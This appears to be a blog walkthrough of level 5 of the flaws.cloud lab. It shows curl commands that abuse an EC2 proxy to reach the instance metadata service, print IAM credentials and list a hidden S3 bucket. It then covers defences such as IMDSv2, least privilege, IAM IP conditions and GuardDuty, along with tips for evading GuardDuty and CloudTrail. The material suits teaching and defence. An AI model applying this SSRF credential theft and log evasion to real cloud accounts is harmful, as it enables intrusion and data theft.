OK, this is not exactly what we will do. This game focuses on cloud security only and is kept simple. There won’t be complex applications protected by WAFs, just a simple proxy on an EC2 instance serving all the websites you request. From there, the goal is to find out how to make it serve the private IAM credentials that have been configured for this machine. Once you have them, all that is left is to use them to impersonate the EC2 instance and exfiltrate some data.
Still, it is very similar to what people believe happened in the CapitalOne hack. Check krebsonsecurity.com for what is known about it, or this indictment for the official version. The gist is that CapitalOne supposedly operated a well-known open source WAF called ModSecurity and accidentally configured it to grant access to the so-called EC2 instance metadata service. It provides IAM credentials to whoever has network access to it. These credentials allowed downloading the stolen data.
That is all. Let’s get going and see how all of this works.
Level 5
The level starts here From the description we know that this link points to a proxy service operated on an EC2 instance. We can ask it to fetch any website for us by appending the URL to the “proxy” endpoint and terminating with a “/”.
Our goal is to get access to a bucket with a hidden directory. Most likely we have to find some credentials with permissions to access to it.
Exploring the proxy
That was just the description. Let’s test the proxy to see if it works as promised. To do so, fetch the (HTTP) homepage of Google both directly and via the proxy. Here is the direct request (I show only a few headers):
# curl -i http://google.com
HTTP/1.1 301 Moved Permanently
Location: http://www.google.com/
Server: gws
...
We receive a 301 redirecting to the HTTPS-version of the site. The server header is “gws”, which is the name Google’s proprietary web server uses (Google Web Server). Now request the site via the proxy:
# curl -i http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/google.com/
HTTP/1.1 301 Moved Permanently
Location: http://www.google.com/
Server: nginx/1.10.0 (Ubuntu)
...
This is mostly the same result but the server now is nginx 1.10.0. This time the EC2 instance made the request to Google and forwarded the result to us.
Using icanhazip.com, a web site that simply returns your IP address to you, we can further confirm this. Compare these two requests:
# curl icanhazip.com
132.83.234.10
#
# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/icanhazip.com/
35.165.182.7
The direct request returns your public IP address whereas the proxied request
returns the public IP address of the proxy, which is 35.165.182.7
.
You can verify this proxy IP address with “dig”:
# dig 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud @9.9.9.9
...
;; ANSWER SECTION:
4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud. 300 IN CNAME ec2-35-165-182-7.us-west-2.compute.amazonaws.com.
ec2-35-165-182-7.us-west-2.compute.amazonaws.com. 43200 IN A 35.165.182.7
Thus we now know for sure we can use this EC2 instance to make requests on our behalf and we control the host name. To the site we request, it will be as if the EC2 instance does the request. What can we do with that?
Accessing Instance Metadata
EC2 instances on AWS have access to a so-called metadata service.
The service is made available on a link-local IPv4 address (see RFC 3927)
at 169.254.169.254
. Accordingly it is only available from the EC2 instance
itself and can never be requested from any other host.
Did the creator of the proxy block access to link-local IPv4 addresses? We should find this out. Go to http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254 and what you get is this:
# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
1.0
2007-01-19
...
2018-09-24
latest
This looks like the entry page for the metadata service. We have access!
The metadata service exposes plenty of configuration data about the instance. Start at 169.254.169.254/latest and follow the (non-clickable) links to explore. For example, at 169.254.169.254/latest/dynamic/instance-identity/document/ you will find the following high-level summary of the configuration:
{
"privateIp" : "172.31.41.84",
"devpayProductCodes" : null,
"marketplaceProductCodes" : null,
"version" : "2017-09-30",
"instanceId" : "i-05bef8a081f307783",
"billingProducts" : null,
"instanceType" : "t2.micro",
"availabilityZone" : "us-west-2a",
"kernelId" : null,
"ramdiskId" : null,
"accountId" : "975426262029",
"architecture" : "x86_64",
"imageId" : "ami-7c803d1c",
"pendingTime" : "2017-02-12T22:29:24Z",
"region" : "us-west-2"
}
Another place for valuable information is the user data. AWS lets you specify a script that runs when an instance boots up. You could see the script at 169.254.169.254/latest/user-data, but for this instance there is none. In other cases you may find hard-coded credentials in this script file.
Most importantly though you should check for IAM instance profile credentials. Instead of hard-coding passwords into EC2 instances AWS allows you to assign an instance profile to a machine. This machine can then request temporary credentials with corresponding permissions from the metadata service. Credentials are only valid for a short time (a few hours at most) and never touch any disk.
This means that we should be able to ask to proxy to get these credentials for us. The manual request is a two-step procedure. First, find the instance profile name at 169.254.169.254/latest/meta-data/iam/info/, which will look like this:
{
"Code" : "Success",
"LastUpdated" : "2019-11-12T15:26:22Z",
"InstanceProfileArn" : "arn:aws:iam::975426262029:instance-profile/flaws",
"InstanceProfileId" : "AIPAIK7LV6U6UXJXQQR3Q"
}
Now we know it is called “flaws”. Fetch temporary credentials for the role from 169.254.169.254/latest/meta-data/iam/security-credentials/flaws and you should see something like this:
{
"Code" : "Success",
"LastUpdated" : "2019-11-12T15:26:38Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIA6GG7PSQG2DUIX6WK",
"SecretAccessKey" : "nqHFBc6JioWLn97VcuR2M3JYDHoaMfsuc1oKyasH",
"Token" : "IQoJb3JpZ2luX2VjEPD//////////wEaCXVzLXdlc3QtMiJGMEQCIG1yD/Vn/GDjnsCiO/Z0fpBMb0683hKDRtchraQcILQEAiAejtgTNX34u9vtT3fOqgyrNK2bvVMJWC0BMg1RxT4Y8SrSAggZEAAaDDk3NTQyNjI2MjAyOSIMlCGMWOpWm2U+5ItZKq8Ct4hi0KsQvsXCfRZs6M5uSUcBsh6voTztyBRx/gz03VmntxcTVHQZ0A9OwVYqzwo5OPzrauGqWAvzoT4NfcYVhNL1aWezbfXASLlLntO2m3RUFzoJUxMTHA3MM0myFuSVpW4DQBh+uDHCBwaxODYp4lAIbLBWE5+AVFLo0VdCVMUI7Syp181BmJiOWG62VuP6Mo5GHYvnWej7X2i7xt8FK7glanlayMpxto0a5KQsQI0NlLXKthvplOE9vMXKluVhBDj6PEvWYfE2rrVqmordfmqWkJbzs/Xu3XO0QbH/O2wbisOp3Rh+hQ72vAGGyQNUyy/j4iDXvkSJf6XE0+MiCiDLIkzZO3QbhHogTLQruChDF4hFagZJpa3vzfuKe+a4867KwjPYy6TqSsQS6vz/MJ6eq+4FOs4CZqC9yNSdhvUV4feei8iDC4PLQc9kanGY/74wYTo6jhynACeOZaxTbK3lHPwOtR4EDTdHmvtZ85ayXJ0zmjVndR0lB/Mt7LAQx8yXNpT23u6bK4XdN928nxF6QvrOHzuteHrSGKLcZOsQZZ/G5kovD6o3eeJ++1lymBNPtzN3/FaeVMgPly7gMbbCRqW/Q65Zw7tTYbKVLQJAfAh19ukfnuCNDMJexaSaMWM5l+djbD+TNw9A3cm+GAb6j6yYAv21+EnBAuUxOISI5CCI+9wRfKGHu/vgSLVt1uwvkHnFBFMcvVfcTYg8kQIEGZTQnxOw/sDr/32PugpmXjBc3OdLajgucrKkUdhaHP/XIA8nEYy8yTQHZguw9tsXaox4wz/dQKMzJsT+6mGdmMGyOnKMZmlW9ZqqXgHC57fi01IhjcamrxZr9E216qNTvsYS2g==",
"Expiration" : "2019-11-12T21:42:31Z"
}
Nice, we have a key and a session token.
Using the credentials
So we have credentials now. Lets try to list the bucket. To use the credentials, you could source them into your environment:
# export AWS_ACCESS_KEY_ID=ASIA6GG7PSQG2DUIX6WK
# export AWS_SECRET_ACCESS_KEY=nqHFBc6JioWLn97VcuR2M3JYDHoaMfsuc1oKyasH
# export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEPD//////////wEaCXVzLXdlc3QtMiJGMEQCIG1yD/Vn/GDjnsCiO/Z0fpBMb0683hKDRtchraQcILQEAiAejtgTNX34u9vtT3fOqgyrNK2bvVMJWC0BMg1RxT4Y8SrSAggZEAAaDDk3NTQyNjI2MjAyOSIMlCGMWOpWm2U+5ItZKq8Ct4hi0KsQvsXCfRZs6M5uSUcBsh6voTztyBRx/gz03VmntxcTVHQZ0A9OwVYqzwo5OPzrauGqWAvzoT4NfcYVhNL1aWezbfXASLlLntO2m3RUFzoJUxMTHA3MM0myFuSVpW4DQBh+uDHCBwaxODYp4lAIbLBWE5+AVFLo0VdCVMUI7Syp181BmJiOWG62VuP6Mo5GHYvnWej7X2i7xt8FK7glanlayMpxto0a5KQsQI0NlLXKthvplOE9vMXKluVhBDj6PEvWYfE2rrVqmordfmqWkJbzs/Xu3XO0QbH/O2wbisOp3Rh+hQ72vAGGyQNUyy/j4iDXvkSJf6XE0+MiCiDLIkzZO3QbhHogTLQruChDF4hFagZJpa3vzfuKe+a4867KwjPYy6TqSsQS6vz/MJ6eq+4FOs4CZqC9yNSdhvUV4feei8iDC4PLQc9kanGY/74wYTo6jhynACeOZaxTbK3lHPwOtR4EDTdHmvtZ85ayXJ0zmjVndR0lB/Mt7LAQx8yXNpT23u6bK4XdN928nxF6QvrOHzuteHrSGKLcZOsQZZ/G5kovD6o3eeJ++1lymBNPtzN3/FaeVMgPly7gMbbCRqW/Q65Zw7tTYbKVLQJAfAh19ukfnuCNDMJexaSaMWM5l+djbD+TNw9A3cm+GAb6j6yYAv21+EnBAuUxOISI5CCI+9wRfKGHu/vgSLVt1uwvkHnFBFMcvVfcTYg8kQIEGZTQnxOw/sDr/32PugpmXjBc3OdLajgucrKkUdhaHP/XIA8nEYy8yTQHZguw9tsXaox4wz/dQKMzJsT+6mGdmMGyOnKMZmlW9ZqqXgHC57fi01IhjcamrxZr9E216qNTvsYS2g==
Confirm that it worked by checking your caller identity. It should be a role with the same name as the instance profile, with the instance ID as session name:
# aws sts get-caller-identity
{
"UserId": "AROAI3DXO3QJ4JAWIIQ5S:i-05bef8a081f307783",
"Account": "975426262029",
"Arn": "arn:aws:sts::975426262029:assumed-role/flaws/i-05bef8a081f307783"
}
Now the final part is easy. List the bucket:
# aws s3api list-objects-v2 --bucket level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud --region us-west-2
{
"Contents": [
...
{
"Key": "ddcc78ff/index.html",
"LastModified": "2017-03-03T04:36:25.000Z",
"ETag": "\"e144e5208ec070129e9e0bd9369967b0\"",
"Size": 2782,
"StorageClass": "STANDARD"
},
{
"Key": "index.html",
"LastModified": "2017-02-27T02:11:07.000Z",
"ETag": "\"6b0ffa72702b171487f97e8f443599ee\"",
"Size": 871,
"StorageClass": "STANDARD"
}
]
}
Up there you can see that we found the secret subdirectory “ddcc78ff”. We can now go to the hidden page and find ourselves in level 6.
The flaw
The main problem in this level is clearly the proxy not blocking requests to the metadata service. By default, a proxy intended for websites should probably be set up such that it blocks at least link-local (RFC 3927) as well as private (RFC 1918) IP addresses, maybe with carefully added exceptions depending on the use case.
Still, you might argue that this is a rather special use case. Not many people set up proxies like this one. From the application development point of view though any server-side request forgery (SSRF) vulnerability may be exploitable in the same way. So, besides the fact that you should carefully check the config of your WAFs and other proxies, another learning is to realize how bad SSRF can be if you host your stuff on EC2. The HackerOne tutorial on SSRF specifically mentions EC2 metadata as a reason why SSRF can have big impact.
Prevent misconfigurations and SSRF
Obviously not making a mistake will always fix it but puts considerable responsibilities on admins and developers. Only one mistake is needed to create a problem. Still, fewer problems means it is harder to find one, so give your best. Give your best, write secure code and test applications as well as all networking tools for this. Critical components are everything that performs outbound requests on the users behalf and is somehow configurable. For example there could be a webhooks feature with SSRF.
Besides crossing your fingers you could also firewall outgoing connections. This can help but only if the legitimate applications running on the machine do not need the connection. For example, in this level the instance may need access to the instance profile credentials (why else would it have an instance profile) so you can’t just block access to it. In other cases it may help though.
IMDSv2
There is a brand-new instance metadata service which is way more secure than the traditional one, announced only a few days ago. Official documentation is here. By default both versions run in parallel but it is possible to disable the old version explicitly.
With this new version you have to set up a session with the metadata service before you can retrieve anything. You do so by requesting “http://169.254.169.254/latest/api/token” using the PUT method. It returns a token that needs to be in the “X-aws-ec2-metadata-token” header for all subsequent GET requests against the metadata service.
In our case it would have stopped the attack had version 1 been disabled. The proxy will only do GET requests for us so there is no way to send a PUT for the login. (Presumably) there is also no way to brute-force the token it would have returned. As a result we would not be able to extract credentials.
For example, my (silly) try to make the proxy do a PUT can be seen below. Issuing a PUT against Google returns a complaint about an invalid method:
# curl -i -X PUT -d 'param=value' http://google.com
HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD
...
Trying to send this through the proxy returns just a 403:
# curl -i -X PUT -d 'param=value' http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/http://google.com
HTTP/1.1 403 Forbidden
...
Least privilege
When you are done with the above then assume that all of it does not help and your credentials will get disclosed. It often requires some effort to design permissions tailored to the application using it. Still, it is the only way to limit the blast radius of a disclosure.
The CapitalOne hack is a great example for this. In an effort to present evidence for a hack, the indictment mentions the fact that the WAF security account listed S3 buckets even though - under normal circumstances - it never does (page 7). This not only indicates unauthorized access, it is also a good example for credentials that have more permissions than they need. If the WAF never does it it should not be allowed to do it. In this case it was, maybe because it was just easier to give access to all of S3 than to specifically check what exactly is needed.
IAM IP constrains
Further assuming an attacker got credentials and the permissions (whatever they are) do allow doing harm. What else can we do to protect us? One thing would be to add IP restrictions to your IAM policies. My personal experience is that AWS is not really designed for this and it can be clumsy to set up but it does stop many attacks.
A lesser known feature of IAM is that it allows you to specify conditions. A policy will only take effect if the conditions are met (AWS docs on condition keys). One such condition is that the public IP address of the entity making the API request has to be in a certain IP range. Consider the IAM policy below as an example. This would deny all actions performed by the IAM user “some-user” unless they originate from IP “1.2.3.4”:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Deny",
"Principal": { "AWS": "arn:aws:iam::account-id:user/some-user" },
"Action": "*",
"Condition": {
"NotIpAddress": {
"aws:SourceIp": [ "1.2.3.4/32" ]
}
}
}
]
}
More details can be found in the knowledge base. Prepare for hard-to-debug problems if you do on large scale. AWS services sometimes use other services on your behalf. The source IP of these requests will not be yours but that of the machine this AWS service is operated on. Thus things may fail, apparently for no reason. For example, AWS Athena, a serverless version of Presto, will access S3 on your behalf to execute queries on your S3 data. Requests to the Athena API will originate from your IP. But follow-up requests to the S3 API, while using your credentials, will originate from the Presto cluster operated by AWS.
For the example in this level you could add a condition to allow using the credentials only from the public IP address of the EC2 instance (you may want to add an Elastic IP to ensure it does not change on a reboot). Such a restriction would make it much harder for us to use the credentials from elsewhere, particularly if we do not know about the restriction. Note that if we do, we may attempt to use the proxy for AWS API access via the EC2 machine. It probably works but looks like quite some work to me (if you successfully did it let me know!). At least with SSRF it may often be impossible to do.
Detection and alerting
Finally, if we can’t prevent it, we should at least know about unauthorized use of credentials. Early detection allows us to deactivate access credentials before serious harm is done. We need alerts and AWS has much to offer in regards to that. Imho the most important services are GuardDuty and CloudTrail.
GuardDuty
First and foremost, there is an AWS service called GuardDuty which watches your account for suspicious behavior. Among other things one of the features is to detect EC2 instance credential use from any host does not have a known EC2 address. Thus, while it would not stop the attack, you would at least receive a warning about suspicious behaviour (e.g., via email). You would receive an UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration finding and get the IP of the attacker.
However, as an attacker it is quite easy to avoid detection by this GuardDuty rule. You can use stolen credentials literally from any EC2 machine on this earth. Just don’t use your laptop. Fire up an attack machine. That is all it takes. An detailed example for this evasion technique can be found on Nick Frichette’s blog.
As a side note: don’t use Kali, Parrot or Pentoo either for your requests. Not even if you run them on EC2. If you do, remember to patch your tools like the AWS CLI and SDKs. The reason is that they expose operating system details to AWS in each request in the user agent. GuardDuty has rules to alert when typical hacker operating systems are used. It is easy to change the user agent to something normal.
CloudTrail
Second, there is a service called CloudTrail which is capable of logging all requests made to the AWS API that somehow relate to your account (actually much of GuardDuty is built on this service). Clever defenders could use it to inspect how credentials are typically used and build alerts for unusual behaviour. For example, above we verified our identity by calling get-caller-identity, an endpoint of the Security Token Service API. If the EC2 instance normally does not do this it would be a good indicator for compromise so see such a call. Filer for “eventName” = “GetCallerIdentity” in CloudTrail to see it.
As an attacker, the only way to avoid detection then is to either use (guess) only legitimate calls, or to call APIs that do not support CloudTrail yet (A nice trick described on rhinosecuritylabs.com). Amazon maintains a list of brand-new services without CloudTrail support here. For example, at the time of writing Amazon Connect is not supported. To see our IAM identity without “get-caller-identity” we could issue a request against this API and - assuming it is unauthorized - the error message contains our identity:
# aws connect describe-user --user-id abc --instance-id 123
An error occurred (AccessDeniedException) when calling the DescribeUser operation: User: arn:aws:sts::975426262029:assumed-role/flaws/i-05bef8a081f307783 is not authorized ...
No entry in CloudTrail would appear that could be alerted on. Knowing the name of a role, you my be able to guess what it is good for and do follow-up calls.
Conclusion
We saw how exploitation of proxy or web application vulnerabilities can lead to disclosure of AWS credentials and how attackers can then leverage these credentials to exfiltrate data. The example of CapitalOne shows that issues like that are a real problem. The workflow is pretty straightforward and, unless sophisticated logging is in place, attackers can pretty much just poke at the AWS API until they find something they have access to. The fact that public clouds have public APIs plays into the attackers hands here.
Multiple things can be done to mitigate the risk:
- Write secure application code and proper configuration so that credentials don’t leak (i.e., do a lot of testing)
- Harden the EC2 instance metadata service to make it hard to exploit a flaw (i.e., disable IMDSv1)
- Follow the principle of least privilege and add IP or VPC constraints when you design IAM policies
- Use AWS loggings and alerting services like GuardDuty and CloudTrail to detect misuse early so that you have time to react ()